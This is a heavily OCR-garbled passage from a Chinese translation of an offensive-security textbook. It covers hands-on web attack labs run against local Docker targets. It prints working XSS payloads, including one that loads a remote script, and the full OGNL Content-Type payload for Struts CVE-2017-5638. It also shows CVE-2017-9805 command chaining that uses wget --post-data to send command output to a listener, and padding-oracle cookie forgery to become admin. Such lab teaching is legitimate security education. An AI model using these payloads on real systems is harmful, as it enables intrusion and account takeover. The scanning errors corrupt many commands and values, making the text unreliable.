data["name"] + "<BR>" + data["address"] + "<BR>" + data["country"] + 


"<BR>was successful."; 


在 构建 得 出 字符 串 的 位 置 添加 了 元 系 ( 用 <BR> 标 记 隅 开 )。 为 插入 script 标 记 ， 将 
在 Full Name 和 Address 字 段 之 间 拆 分 它 ， 但 <BR> 打 乱 了 一 切 。 因 此 ,为 克服 这 一 点 ， 
我 们 将 在 script 标 记 中 创建 一 个 假 的 字段 值 。 接 下 来 ， 为 Full Name 字 段 输入 <script 
qq"， 为 Address 字 段 输入 ">， 人 然后 单 击 Register， 看 一 下 这 是 否 可 行 。 

在 开发 者 工具 的 Inspector 选 项 卡 中 搜索 registration of， 答 看 找到 的 第 二 个 实例 ， 
可 看 到 seript 标 记 已 成 功 插 入 ， 现 在 必须 真正 创建 JavaScript 来 执行 函数 。 为 此 ， 需 要 
利用 DOM。 在 JavaScript 中 ， 大 多 数 函 数 都 是 window 对 象 的 于 对 象 。 在 那里 ， 要 调 
用 alert 函 数 ， 可 使 用 window["alert"](1)。 

接 下 来 使 用 名 称 <script qq= 和 地 址 ">window["alert"](1) 提 交 表 单 ， 看 一 下 发 生 了 
什么 。 我 们 看 到 了 失败 消息 ， 但 没有 文本 。 这 看 起 来 不 错 ， 但 分 析 以 下 代码 后 才能 
确定 : 

«div class="modal-body" id="my-msgbox">Your registration of 

«script qq="<BR>"> window ["alert"] (1)«BR»Afghanistan«BR»was successful. 

«/script» 

«/div» 

这 里 可 看 到 ， 警 告 消息 已 经 成 功 插入 ， 但 其 后 仍 有 文本 。 要 解决 这 个 问题 ， 可 
以 在 Javascript 之 后 放置 分 号 , 将 代码 行 的 其 余部 分 改 成 注释 , 再 次 尝试 。 这 样 一 来 ， 
代码 行 的 其 余部 分 将 不 再 解释 ， 命 令 将 执行 ， 由 浏览 器 负责 关闭 script 标 记 ， 我 们 有 
了 有 效 的 代码 。 为 了 对 此 进行 测试 ， 在 名 称 字段 中 使 用 <script qq="， 在 地 址 字段 中 
使 用 ">window["alert"](1)://。 

图 16-8 显 示 的 警告 框 表明 我 们 成 功 了 。 但 在 Chrome 中 尝试 时 ， 会 发 生 什 么 情 
Du? 同样 可 行 。 通 过 操纵 JavaScript 发 生 了 XSS。 现 在 ， 需 要 进一步 考虑 如 何 绕 过 不 
同类 型 的 XSS 保 护 。 这 只 是 开始 ， 随 看 技术 的 进步 ， 我 们 必须 不 断 改 变 战术 。 因 此 ， 
理解 JavaScript 和 常用 库 将 使 我 们 能 更 邵 练 地 在 受 限 环 场 中 创建 XSS。 
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é ) localhost/example4.htm e earc 
(€) © | localhost/example4-html | ||Q Search 


f Most Visited w [§ Offensive Security "X Kali Linux ‘Kali Docs "& Kali Tools  Exploit-DB W Aircrack 


图 16-8 MOANA 


警告 消息 效 末 不 错 ， 但 有 时 ， 我 们 想 做 的 事情 不 仅仅 是 弹出 一 个 警告 框 。 在 这 
些 情况 下 ， 不 必 将 所 有 JavaScript 代 码 输 入 XSS 中 。 相 反 ， 我 们 希望 XSS 加 载 一 个 远 
程 脚本 ， 然 后 执行 内 容 。 在 本 例 中 ， 将 直接 从 GitHub 加 载 一 些 代 码 ， 然 后 在 应 用 程 
序 中 执行 函数 。 仍 在 Full Name 字 段 中 使 用 <script qq="， 但 使 用 本 例 附带 的 jQuery 库 
中 的 一 些 代 人 码 来 加 载 远程 代码 。 

jQuery 是 一 个 帮助 库 ， 可 帮助 完成 很 多 任务 。 可 找到 很 多 讲解 如 何 使 用 jQuery 
的 教程 ， 此 处 不 过 多 讲述 ， 但 将 使 用 不 同 的 地 址 来 展示 这 种 技术 的 工作 方式 。 现 在 
Address FEKUN FATA: 

"»$.getScript( 

"https://raw.githubusercontent.com/GrayHatHacking/GHHv5 /master/ch16/ 

"apri o hacked(); ) ); // 

此 时 ， 将 直接 从 GitHub 加 载 代码 。 加 载 脚本 时 ， 将 执行 我 们 指定 的 函数 。 在 本 
例 中 ， 只 是 调用 hacked 疯 数 ， 访 函数 位 于 远程 加 载 的 文件 中 。 运 行 hacked 函 数 时 ， 
将 创建 一 个 新 的 警告 杠 ， 但 它 可 完成 使 用 JavaScript 所 能 完成 的 所 有 工作 ， 如 欺骗 登 
录 对 话 框 或 针对 受害 者 进行 击 键 记录 。 


16.2 ”框架 漏洞 
使 用 框架 是 更 快速 开发 代码 的 民 好 方式 ， 不 必 编 写 大 量 代 人 码 就 能 获得 功能 。 在 


2017 年 ， 流 行 的 框架 有 很 多 ， 但 Struts 框 架 (Apache 项 目的 一 部 分 ) 中 出 现 了 两 个 引 人 
Us HA. Struts fe pt f pU 40 AS] - 35:18 2$ (Model-View-Controller; MVC) 
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架构 的 REST、AJAX 和 JSON 等 接口 来 帮助 开发 Web 应 用 程序 。 近 十 年 来 ，Struts 是 
最 大 的 漏洞 来 源 之 一 ， 其 中 ，Equifax 漏 洞 影响 了 1.43 亿 用 户 。 

16.2.1 设置 环境 


对 于 16.2 节 中 的 几 个 实验 , 我 们 将 使 用 包 仿 Struts 漏洞 版 本 的 Web 服 务 损 。 为 此 ， 
需要 从 本 章 对 应 的 GitHub 存 储 库 构 建 一 个 不 同 的 Docker 镜 像 。 开 始 时 ， 务 必 停 止 前 
面 的 Docker 镜 像 : 


i docker container list -É “ancestor=xss"™ 


CONTAINER ID IMAGE COMMAND CREATED 
STATUS PORTS NAMES 

caea75279d86 XSS "/my init" 39 hours ago 
Up 39 hours 0.0.0.0:80->80/tcp vigilant goldwasser 

i docker container stop caea75279d86 

caea/5279d86 


如 果 第 一 个 命令 返回 容器 ， 则 针对 相应 的 容器 了 D 执 行 stop 命 令 。 这 将 停止 前 面 
的 Pocker 镜 像 。 接 下 来 ,需要 创建 一 个 Tomcat 镜 像 ( 其 中 安装 了 存在 源 洞 的 Struts 库 )。 
以 下 命令 假设 处 在 本 书 提 及 的 GitHub 存 储 库 的 Ch16 目 录 下 : 

root8kali:-/Ch164 cd Vuln Tomcat/ 

root@kali:~/Ch16/Vuln Tomcat# docker build -t vuln tomcat . 

Sending build context to Docker daemon .566.9MB 

Step 1/7 : FROM tomcat:9 

«trimmed for brevity> 

Successfully built f800d8acfele 

Successfully tagged vuln tomcat:latest 

root@kali:~/Ch16/Vuln Tomcat# docker run -p 8080:8080 -dti vuln tomcat 

f04e7d549f6a9758079c59319bf06134fff/f0656039624c8a88e851921fa502 

Tomcat KHM “4 Ab Fim 8080. nj ln] Kali 64 位 镜像 上 的 http:Wlocalhost:8080 进 
行 验证 。 


16.22 实验 16-5: CVE-2017-5638iima IA 3 


CVE-2017-5638 7 Struts ESF fs MEETER PRI — ANIK, CCE SK (header) MA 
EPRE K al Fs DE. LMultipartZ) rae AX EB VATI] T4 f AX dd. ATH 
误 上 及 生 时 ， 头 中 的 数据 将 由 Struts 评 估 ， 从 而 允许 代码 执行 。 在 本 实验 中 你 将 看 到 代 
码 如 何 执行 ， 因 此 可 在 目标 实例 上 以 交互 方式 运行 命令 。 

与 Struts 一 起 使 用 的 一 个 示例 应 用 程序 名 为 Struts Showcase， 它 演示 多 个 功能 ， 
以 便 你 了 解 可 用 Struts 完 成 的 工作 类 型 。 但 在 存在 漏洞 的 Struts 版 本 上 ，Showcase 却 
是 便捷 的 攻击 路 任 。 要 在 虚拟 机 上 查看 演示 ， 导 骨 人 http://localhost:8080/struts-showcase/ 
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即 可 看 到 示例 应 用 程序 。 


此 次 攻击 将 使 用 ExploittDB.com 上 有 友 布 的 一 种 攻击 方法 。 可 从 https:/www.exploit-db. 


comy/exploits/41570/ 找 到 攻击 编号 ， 也 可 在 Kali 镜 像 上 使 用 searchsploit， 这 样 将 看 到 
漏洞 攻击 程序 所 在 的 文件 系统 。Kali 安 疼 中 默认 包含 Exploit-DB 攻 击 程序 ,因此 不 必 
专门 下 载 。 这 里 首先 将 攻击 程序 复制 到 本 地 目录 ， 然 后 完成 一 些 基 础 工作 : 获取 正 
在 运行 Tomcat 的 用 户 的 ID。 


# cp /usr/share/exploitdb/platforms/linux/webapps/41570.py . 
# python 41570.py 
http://localhost:8080/struts-showcase/showcase.action id 

[^] CVE: 2017-5638 - Apache Struts? 52-045 

[*] cmd: id 

uid=0 (root) gid=0 (root) groups=0 (root) 


运行 攻击 程序 时 ， 和 针对 的 是 struts-showcase 目 录 中 的 showcase.action 文 件 。 这 是 
Struts 演 示 程 序 的 默认 操作 。 我 们 指定 使 用 命令 这 ， 检 索 正 在 运行 的 服务 规 的 用 户 级 
别 的 d。 些 时 ， 因 为 我 们 在 Docker 中 运行 这 个 攻击 程序 ， 所 有 它 是 在 根 级 别 运 行 的 ; 
实际 上 ，Docker 中 的 大 多 数 应 用 程序 都 在 根 级 别 运行 。 

接 下 来 看 一 下 及 生 了 什么 。 为 此 ， 需 要 快速 修改 脚本 以 显示 调试 信息 。 可 使 用 
目 己 豆 欢 的 编辑 占 ， 使 脚本 的 项 部 如 下 所 示 : 


#!/usr/bin/python 
T o> Coding. EE = 


import urllib2 
import httplib 


handler-urllib2.HTTPHandler (debuglevel-1) 
opener — urllib2.build opener (handler) 
urllib2.install opener (opener) 


这 样 ， 在 运行 脚本 时 ， 将 记录 调试 输出 信息 。 接 下 来 ， 再 次 使 用 id 命 令 运 行 脚 
本 ， 并 查看 输出 。 输 出 内 容 看 上 去 乱 作 一 团 ， 但 可 通过 以 下 命令 行 过 滤 输 出 ， 找 到 


# echo -e ‘python 41570.py 


http://localhost:8080/struts-showcase/showcase.action "id" | grep send: 
| cut LL 2- =d s 

"GET /struts-showcase/showcase.action HTTP/1.1 

Accept-Encoding: identity 

Host: localhost:8080 

Oo 

Content-Type: %{ (# -'multipart/form-data'). (#dm=@ognl.OgnlContext@DEFAULT | 
MEMBER ACCESS) . (# memberAccess? (# memberAccess=#dm) : ((#container=#con 
text [€y com. 
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opensymphony.xwork2.ActionContext.container']). ($ognlUtil-f£container. 
getInstance (B@com. opensymphony.xwork2.ognl.OgnlUtil@class)). 
(#ognlLUtil .getExcludedPackageNames ().clear()) . (#ogn1Util.getExcludedClasses (). 
clear()). (#context.setMemberAccess (#dm) ) ) ) . (@#cmd='id') . (#iswin=(@java. 
lang.System@getProperty('os.name') .toLowerCase().contains('win'))). 
(#cmds=(#iswin?{'cmd.exe','/c', #cmd}:{'/bin/bash', '-c', #cmd}) ) . (#p=new 
@ java. lang. ProcessBuilder (#cmds) ) . (#p.redirectErrorStream (true) ) . 
(#process=#p. start ()) . (@#ros=(@org.apache.struts2.ServletActionContext 
@getResponse ().getOutputStream())). (Gorg.apache.commons.io.IOUtils8copy 
(#process.getInputStream(),#ros)). (#ros.flush()) } 

Connection: close 

User-Agent: Mozilla/5.0 


这 看 上 去 不 错 ， 但 中 间 的 攻击 代码 过 多 ， 因 此 需要 进行 分 解 ， 看 一 下 发 生 的 事 
> £46, 在 Content-Type @ 头 触 友 漏 洞 攻 击 。 将 Content-Type 的 值 设置 为 将 创建 进 

程 的 代码 。 代 但 正在 Struts O 中 创建 一 个 操作 容 占 ， 然 后 调用 一 个 实用 工具 类 ， 允 
许 我 们 在 操作 环境 € 中 工作 。 此 后 ， 代 码 清除 被 阻止 的 函数 ， 并 指定 要 运行 的 命 
^0. 

由 于 代码 不 知道 脚本 将 在 Linux 还 是 在 Windows 上 运行 ,因此 会 in 
统 名 ， 并 构建 运行 脚本 的 cmd.exe 或 bash 语 法 。 接 下 来 使 用 ProcessBuilder @ 2$ 
类 人 允许 创建 一 个 进程 。 此 后 启动 该 进程 ， 由 脚本 捕获 输出 @ ， 从 而 获取 所 有 输出 
并 显示 在 屏 幕 上 。 基 本 上 ， 上 所 有 这 些 都 是 在 创建 一 个 运行 进程 的 环境 ， 运 行 它 ， 区 
取 输 出 并 显示 在 屏幕 上 。 


16.2.3 ”实验 16-6: CVE-2017-980575;58 IX x 


2017 年 ， 就 在 上 一 个 漏洞 公布 后 的 几 个 月 ， 又 公布 了 一 个 Struts 漏 调 ， 该 漏洞 会 
导 人 致 执行 远程 代码 。 该 漏洞 影响 Struts 的 男 一 个 部 分 ， 即 REST 接 口 。 发 送 到 服务 器 
的 数据 被 反 序 列 化 ， 却 未 通过 检查 确保 数据 是 有 效 的 ， 所 以 出 现 了 这 个 漏洞 。 结果 ， 
可 以 创建 和 执行 对 象 。 遗 憾 的 是 ， 我 们 无 法 看 到 这 个 汤 洞 的 实际 影响 。 因 此 ， 我 们 
将 完成 一 些 额外 工作 来 获得 与 目标 系统 的 任意 类 型 的 交互 。 

自 先 需 要 针对 此 涯 洞 发 起 攻击 。Exploit-DB 包 含 可 用 的 攻击 程序 。 可 从 
https://www.exploit-db.com/exploits/42627/ 获 得 该 程序 , 也 可 再 次 使 用 searchsploit 谷 找 
本 地 副本 。 下 面 使 用 本 地 副本 ， 并 将 其 复制 到 目录 中 : 


# searchsploit -u 
= T ata 42621 


Exploit Title | Path 
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root@kali:~/Ch16/Vuln Tomcat/working/a# cd ../.. 

# cp /usr/share/exploitdb/platforms/linux/remote/42627.py . 

有 了 攻击 用 的 本 地 副本 ， 需 要 确保 目标 位 置 是 正确 的 。 为 确保 可 到 达 页 面 ， 可 
访问 http://localhost:8080/struts-rest-showcase/orders.xhtml。 这 是 Struts Rest Showcase 
的 主页 ， 访 主页 本 喘 并 没什么 可 攻击 之 处 。 由 于 访 漏 洞 存在 于 消息 处 理 中 ， 我 们 需 
要 找到 可 提 区 数据 的 页 面 。 单 击 Bob 的 视 儿 ， 将 进入 orders/3 页 面 ， 这 正 是 我 们 要 使 
用 的 页 面 。 接 下 来 执行 一 个 简单 测试 : 

# python 42627.py 

http://localhost:8080/struts-rest-showcase/orders/3 "id" 

«LOTS AND LOTS OF ERRORS» 

</pre><p><b>Note</b> The full stack trace of the root cause is 


available in the server logs.«/p»«hr class-"line" /><h3>Apache 
Tomcat/9.0.0.M26«/h3»«/body»«/html» 


WS 提示 : 如 果 看 到 有 关 无 效 UTF-8 字 符 的 错误 消息 ， 只 需要 使 用 自己 喜欢 的 
> 编辑 器 删除 42627.py 文 件 中 的 “# Version: Struts 2.5 - Struts 2.5.12” 一 行 
即 可 。 
我 们 的 测试 产生 了 大 量 错误 ， 但 这 未 必 有 意义 。 此 类 漏洞 攻击 程序 在 运行 时 创 
建 异 般 ， 因 此 错误 消 上 且 实 际 上 有 蔓 无 害 。 如 何 确定 测试 己 经 生效 ? 可 为 我 们 的 命令 
执行 一 次 ping 检 查 。 在 一 个 窗口 中 局 动 pcap 捕 获 : 


# tcpdump -A -s 0 -1 dockerO icmp 
tcpdump: verbose output suppressed, use -v or -vv for full protocol 


decode 
listening on docker0, link-type EN10MB (Ethernet), capture size 262144 
bytes 


在 男 一 个 窗口 中 运行 攻击 程序 ,这 将 执行 五 次 ping 检 查 , 如 果 可 行 ,将 在 Docker0 
接口 中 看 到 它 : 


# ip addr show dev docker0O 
3: docker0: «BROADCAST,MULTICAST,UP,LOWER UP» mtu 1500 qdisc noqueue 
state UP 
group default 
link/ether 02:42:07:b8:42:82 brd ff:ff:ff:ff:ff:ff 
inet 172.17.0.1/16 scope global dockerO0 
valid lft forever preferred lft forever 
inet6 fe80::42:7ff:f6b8:4282/64 scope link 
valid lft forever preferred lft forever 
# python 42627.py 
http://localhost:8080/struts-rest-showcase/orders/3 "ping -c 5 
LIZ.LT.U.Ll" 
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Docker0 实 例 将 被 绑 定 到 Docker0 接 口 ， 因 此 ， 为 验证 攻击 程序 正在 工作 ， 将 对 
Docker0 接 口 — ewan 应 当 在 pcap 捕 获 中 看 到 这 些 ping 操 作 。ping 操 
作 显 示 我 们 在 主机 上 成 功 运 行 了 命令 。 遗 憾 的 是 ，Docker 容 右 相 当 人 简单 ， 我 们 需要 
在 其 中 放 入 一 些 内 容 ， 才 能 与 主机 真正 进行 交互 。 由 于 pcap 仍 在 运行 ， 看 一 下 我 们 
可 使 用 哪些 命令 。 我 们 可 使 用 的 两 个 理想 命令 是 用 于 发 送 数据 的 curl 和 wsget。 首 先 符 
试 使 用 curl: 

# python 42627.py 

http://localhost:8080/struts-rest-showcase/orders/3 ' 

ping -c 5 -p ‘curl http://localhost || echo -n "ff"^ 172.17.0.1 ' 

VA B OR ze B] LI VT ping BRE. (Hax E Nping (# A-pactar eli, VAIRE 
成 功 或 错误 情形 。 如 果 curl 不 存在 ， 则 返回 执行 ping 操 作 ; 如 果 存 在 ， 则 什么 都 不 返 
器 ， 因 为 命令 是 无 效 的 。 我 们 看 到 ping， 因 此 镜像 中 不 存在 curl。 尝 试 使 用 weget: 

# python 42627.py 

http://localhost:8080/struts-rest-showcase/orders/3 ' 

ping -c 5 -p ‘wget http://localhost || echo -n "ff"^ 172.17.0.1 ' 

我 们 没有 得 到 啊 应 ， 看 起 来 wget 是 存在 的 。 在 Ch16 目 录 的 Vuln Tomcat H 3& 
中 ， 可 看 到 名 为 webcatcherpy 的 文件 。 Miei 这 个 文件 来 捕获 一 些 基本 的 wget 数 
据 ， 使 用 wsget 发 送 POST 数 据 (使 用 命令 的 输出 


# python webcatcher.py 9090 
Server started on port 9090 


对 于 这 个 攻击 程序 ， 需 要 构建 一 些 命 令 ， 从 而 使 用 wget 获 取 数 据 。 为 此 ， 将 使 
用 --post-data 选 项 ， 在 POST 数据 中 发 回 特 ae 出 。Webcatcherpy 将 捕获 POST 数据 并 
显示 。 下 面 通 过 构建 命令 ls 来 执行 基本 的 显示 


# Python 42627.py 
http://localhost:8080/struts-rest-showcase/orders/3 ' 


E LI 


wget -O /dev/null --post-data "a-' echo; 1s 
http://172.17.0.1:9090/asdf ' 


BA VME RHdwgetlz rA S1 Web As 28. THES t X TE 7J/dev/null. 使 它 实 际 上 
什么 都 不 下 载 ; 将 POST 数据 设置 为 命令 输出 。 首 先 使 用 echo 命 令 获 得 新 行 以 提高 6 
读 性 ， 然 后 执行 8。 在 Web 服 务 器 上 ， 应 看 到 请 求 和 POST 数据 ; 


172.17.0.2 — — [30/Sep/2017 00:50:32] "POST /asdf HTTP/1.1" 200 — 
172.17.0.2 - - [30/Sep/2017 00:50:32] a- 

LICENSE 

NOTICE 


RELEASE-NOTES 
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这 是 可 行 的 。 现 在 ， 虽 然 攻击 程序 未 同 网 页 返回 数据 ， 但 我 们 可 生成 成 功 返 回 
和 失败 返回 ， 从 而 了 解 在 后 台 发 生 的 事情 。 也 可 使 用 内 置 的 工具 发 送 数 据 ， 以 便 看 
到 交互 情况 。 

源 代 人 码 过 长 ， 无 法 在 本 章 正 文中 列 出 。 如 果 想 浏 贤 执 行 的 源 代码 ， 可 查看 
42627.py 文 件 中 的 代码 。 这 个 攻击 程序 在 本 质 上 类 似 于 上 一 个 攻击 程序 ， 也 使 用 
ProcessBuilder 执 行 命令 。 但 在 这 个 实例 中 ， 攻 击 程序 及 用 XML 格 式 ， 作 为 寞 党 的 一 
部 分 进行 解析 。 


16.3 Padding Oracle Attack 


伴随 着 2014 年 发 现 的 NET 漏洞 ，Padding Oracle Attack RELH, EME 
Dviewstate 信 息 。viewstate 包 含 应 用 程序 中 用 户 状 态 的 相关 信息 ， 因 此 可 能 利用 这 
个 漏洞 攻击 程序 以 更 改 访问 权限 、 执 行 代码 等 。 这 个 漏洞 攻击 程序 发 布 后 ， 人 们 意 
识 到 很 多 设备 和 应 用 程序 都 容易 受到 此 类 攻击 ， 该 攻击 程序 受到 更 多 关注 ， 许 多 防 
御 工 具 也 应 运 而 生 。 

那么 ，Padding Oracle Attack FIJE Qe) LE? 使 用 密码 分 组 链 (Cipher Block 
Chaining，CBC) 模 式 加 密 类 型 时 ， 会 将 数据 拆 分 为 块 进行 加 密 。 根 据 前 一 个 块 的 数 
据 ， 使 用 种 子 值 对 每 个 块 进行 加 密 ， 这 增加 了 随机 性 ， 使 发 送 给 不 同人 员 的 同一 消 
恩 看 上 去 是 不 同 的 。 如 果 没 有 足够 的 数据 填充 块 ， 就 用 额外 数据 填充 来 达到 所 需 的 
块 长 上 度 。 如 果 最 终 所 有 的 块 痢 满 了 ， 则 添加 一 个 空 块 。 

使 用 Padding Oracle Attack， 可 利用 加 密 原 理 ， 基 于 可 能 的 填充 值 ， 推 由 出 上 一 
个 块 中 的 数据 。 得 到 上 一 个 块 后 ， 进 行 数 据 解 密 。 一 旦 解密 数据 ， 可 重新 加 密 ， 并 
蔡 代 原始 数据 。 理 想 状 况 下 ， 发 送 的 数据 有 一 个 校 验 和 ， 用 以 确认 是 否 已 经 修改 ， 
但 存在 漏洞 的 主机 不 执行 此 计算 ， 因 此 可 以 随意 进行 修改 。 


5 as = A ` | : = ja 
4 注意 : 这 是 一 个 十 分 复杂 的 主题 ， 需 要 执行 大 量 的 数学 运算 。Bruce Barnett 
NETA 


\_S 就 此 写 过 一 篇 十 分 精彩 的 文章 ， 可 参见 本 章 的 “扩展 阅读 ”"。 如 果 想 要 了 解 
有 关 加 密 的 更 多 数学 原理 ， 这 篇 文章 是 一 个 不 错 的 起 点 . 


实验 16-7: 使 用 Padding Oracle Attack 更 改 数据 


本 实验 将 更 改 映 份 验证 cookie， 演 示 这 种 攻击 方式 。 我 们 将 使 用 
http:;//pentesterlab.com 上 的 示例 Web 应 用 程序 来 设置 目标 并 利用 另 一 个 Docker 镜 像 来 
部 着 ， 因 此 先 设 置 该 镜像 。 在 一 个 新 窗口 中 ， 从 Chl6padding 目 录 执 行 以 下 命令 : 


root@kali:~/Ch16/padding# docker container ls -f 


307 
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"ancestor-vuln tomcat" 


CONTAINER ID IMAGE COMMAND CREATED 
STATUS PORTS NAMES 

f04e/d549f6a vuln tomcat "catalina.sh run" 12 hours ago 
Up 12 hours 0.0.0.0:8080->8080/tcp quirky shannon 
root@kali:~/Ch16/padding# docker container stop f04e7d549f6a 
f04e7d549f6a 


root@kali:~/Ch16/padding# docker build -t padding . 

Sending build context to Docker daemon 157.7kB 

«trimmed for brevity> 

Successfully built 1f8a63lcbb0a 

Successfully tagged padding:latest 

root@kali:~/Ch16/padding# docker run -p 80:80 -dit padding 

接 下 来 在 Web 浏 览 器 中 打开 http:Wlocalhost， 验 证 页 面 已 经 下 载 。 该 实验 将 使 用 
Firefox。 首 先 需要 创建 一 个 新 账户 ， 因 此 单 击 Register 进 行 创 建 ， 用 户 名 为 hacker， 
黎 但 为 hacker。 单 击 Register 时 ， 将 看 到 一 个 网 页 ， 显 示 已 经 以 hacker 导 份 登录 。 

有 了 一 个 有 效 账 尸 后 ， 便 从 应 用 程序 中 获取 cookie。 为 此 ， 按 下 Ctrl+Shift+I 组 
合 键 以 打开 开 及 者 工具 。 单 击 Console 选 项 卡 ， 然 后 和 单 击 窗口 撒 部 的 >> 提 示人 符 。 我 们 
想 要 获取 cookie， 因 上 [尝试 输入 document.cookie。 输 出 结果 类 似 于 图 16-9， 但 你 的 
cookie 值 可 能 与 此 不 同 。 


[4 Cl Inspector D Debugger {} Style Edi.. (S; Performa... kM 
tJ e Net e CS e JS e Security ~ eLogging ~ @ Server 


The character encoding of the HTML document was not declared. The document 
configurations if the document contains characters from outside the US-ASCT 
be declared in the document or in the transfer protocol. 


» document.cookie 
€ |— auth-TOdSvw8eYcwsCllCaMS7t0T1j5320kRK 


图 16-9 ”已 登录 用 户 的 cookie 值 


注意 : 如 果 搜 索 结 果 中 什么 都 未 显示 ， 则 尝试 清除 调试 器 中 的 所 有 过 
Z2. d 过 滤器 会 阻止 内 容 的 显示 。 


现在 有 了 cookie。 看 一 下 能 人 否 可 以 利用 Padding Oracle Attack Acookie3X BUS - 
为 此 ， 将 使 用 padbuster 工 具 。 我 们 指定 cookie 值 ， 符 试 解密 的 什 ， 以 及 供 padbuster 
解密 的 使 用 这 个 cookie 的 URLIL。 

我 们 需要 指定 有 关 padbuster 脚 本 的 几 个 参数 。 人 第 一 个 是 URL， 第 二 个 是 要 更 改 
的 值 。 由 于 该 脚本 的 加 密 方法 使 用 的 块 大 小 是 8， 因 此 指定 8。 最 后 指定 cookie 和 编 
公 。 编 公 为 0 意味 着 使 用 Base64。 现 在 ， 尝 试 使 用 Padding Oracle Attack: 


# padbuster http://localhost/login.php TOdSvw8eYcwsCllCaMS7t0TIj5320kRK 8 \ 
--cookies auth=TOdSvw8eYcwsCllCaMSi7t0TIJS320kRK --encoding 0 
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| PadBuster - v0.3.3 | 
| Brian Holyfield - Gotham Digital Science | 
| 


labs@gdssecurity.com | 


INFO: The original request returned the following 
[+] Status: 200 

[+] Location: N/A 

[+] Content Length: 1530 


INFO: Starting PadBuster Decrypt Mode 
eee ZSbarbing Block 1 oi 2 === 


INFO: No error string was provided...starting response analysis 
*** Response Analysis Complete *** 
The following response signatures were returned: 


ID# Freq Status Length Location 


1 1 200 1608 N/A 
Z ** 233 200 15 N/A 


Enter an ID that matches the error condition 
NOTE: The ID4 marked with ** is recommended : 2 


Continuing test with selection 2 

«trimmed for brevity> 

Block 2 Results: 

[+] Cipher Text (HEX): 44c88f9df6a2444a 

[+] Intermediate Bytes (HEX): 476e2b476dclbeb2 
[+] Plain Text: ker 


** Finished *** 

[+] Decrypted value (ASCII): user-hacker 

[+] Decrypted value (HEX): 757365723D6861636B65720505050505 
[+] Decrypted value (Base64): dXNl1cjloYWNrZXIFBQUFBQ-- 


当 padbuster 提 示 成 功 或 错误 情形 时 ， 我 们 选择 2， 原 因 在 于 它 最 第 见 ， 而 且 测 试 
中 错误 情形 多 于 成 功 情形 。 它 也 是 padbuster 推 荐 的 值 ， 是 一 个 不 错 的 选择 。 我 们 看 


到 ，cookie 被 解密 ， 值 是 usetr=hacker。 
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现在 看 到 了 cookie 值 。 如 ———— 使 其 读 作 user=admin， 岂 不 更 好 ? 使 


用 padbuster， 同 样 可 做 到 这 一 点 。 我 们 需要 再 次 指定 cookie， 为 其 提供 要 编码 的 数 
据 ， edn PARA FP: 


# padbuster http://localhost/login.php TOdSvw8eYcwsCllCaMS7t0TIj5320kRK 8 \ 
--cookies auth-TOdSvw8eYcwsCllCaMS7t0TIj5320kRK --encoding 0 \ 
--plaintext user-admin 

«trimmed for brevity> 


** Finished *** 


[+] Encrypted value is: NE AN EMEN MEE 


这 样 就 有 了 加 密 的 cookie 值 。 下 一 步 是 将 这 个 值 反 过 来 添加 到 cookie， 重新 加 载 


网 页 ， 看 一 下 是 否 可 行 。 可 复制 输出 ， 然 后 运行 以 下 两 个 命令 来 设置 cookie: 


document.cookie-"auth-BAitGdYuupMjA3gllaFoOwAAAAAAAAAA" 


document.cookie 


在 设置 cookie 并 重新 得 询 后 ， 输 出 显示 cookie 真 被 设置 为 新 值 。 图 16-10 显 示 了 


cookie 的 初始 查询 ， 更 改 cookie 值 ， 再 次 查询 。 一 旦 设置 了 cookie， 单 击 浏览 器 中 的 
Refresh 按 钮 ， 你 将 看 到 ， 己 经 成 功 地 以 admin 里 份 登录 (在 屏 各 的 部 以 绿色 显示 )。 
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Ct Inspector Mm (^ Debugger {} Style Edi.. (& Performa... {F Memo 
e Net e CSS e JS e Security ~ @ Logging ~ eServer 


The character encoding of the HTML document was not declared. The document will 
configurations if the document contains characters from outside the US-ASCII re 
be declared in the document or in the transfer protocol. 


document.cookie 


"auth-TOdSvwBeYcwsCllCaMS7t0T1j5320kRK" 


document.cookie-"auth- xx METERS 
"authzBAitGdYuupMj A3g11 aFoOWwAAAAAAAAAA " 
document.cookie 


"auth-BAitGdYuupMj 


116-10  & ri cookiefl 


164 Wh 


下 面 总 结 本 章 介绍 的 内 容 : 
e 循序 渐进 地 讲述 如 何 使 用 较 复 杂 的 方法 攻击 Web 应 用 程序 的 XSS 漏 洞 。 
e 如 何 攻 击 Struts 示 例 应 用 程序 中 的 两 闫 序列 化 问题 。 

e 如何 将 多 个 命令 链接 在 一 起 ， 确 定 诗 目 攻击 时 命令 的 成 败 。 

e Padding Oracle Attack 的 工作 原理 ， 以 及 如 何 使 用 它 更 改 cookie 值 。 
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与 利 荔 最 大 化 所 驱动 的 漏洞 研究 相 呼 上 应， 对 漏洞 补丁 进行 二 进 制 比较 的 研究 兴 
趣 也 在 日 荔 增 长 。 私 下 泄密 和 内 部 友 现 的 漏洞 过 单 只 提供 了 有 限 的 拉 术 细 市 。 二 进 
制 比较 的 流程 可 比 作 寻宝 之 旅 一 一 只 同 研 究 人 员 提 供 了 关于 漏洞 (或 “宝藏 ”) 的 有 限 
的 位 置 和 细 市 信息 。 夺 有 适当 的 技能 和 工具 , 研究 人 员 即 可 定位 和 识别 代码 的 变化 ， 
随后 便 可 看 手 开发 可 用 的 漏洞 攻击 程序 。 


本 章 洱 兰 的 主题 如 下 : 
应 用 和 补丁 比较 
二 进 制 比较 工具 
补丁 管理 流程 
真实 世界 中 的 比较 


17.1 有 关 二 进 制 比较 的 介绍 


对 变更 库 、 应 用 程序 和 驱动 程序 之 类 的 已 编译 代码 ， 打 了 补丁 的 和 未 打 补 丁 的 
版 本 之 间 的 差异 可 被 用 于 挖掘 漏洞 。 究 其 本 质 来 说 ， 二 进 制 比较 就 是 识别 同一 文件 
的 两 个 版 本 (如 1.2 版 本 和 1.3 版 本 ) 之 间 才 异 的 流程 。 可 以 说 ， 二 进 制 最 闸 见 的 目标 对 
象 是 微软 补丁 ;但 是 也 可 应 用 于 许多 不 同类 型 的 编译 代码 。 很 多 工具 都 可 简化 二 进 
制 比较 的 过 程 ， 从 而 允许 审查 者 能 快速 地 从 反 汇 编 代 码 的 角度 识别 代码 的 变化 。 


17.1.1 应 用 程序 比较 


应 用 程序 新 版 本 的 发 布 已 司空 见 惯 。 育 后 的 理由 可 能 是 推出 新 的 功能 、 更 改 代 
但 、 文 持 新 的 平台 或 内 核 版 本 、 使 用 Canaries 或 控制 流 防 护 (Control Flow Guard, CFG) 
之 类 新 的 编译 时 安全 控制 方法 ， 以 及 修复 漏洞 等 。 通 币 ， 新 版 本 的 推出 可 能 是 上 述 
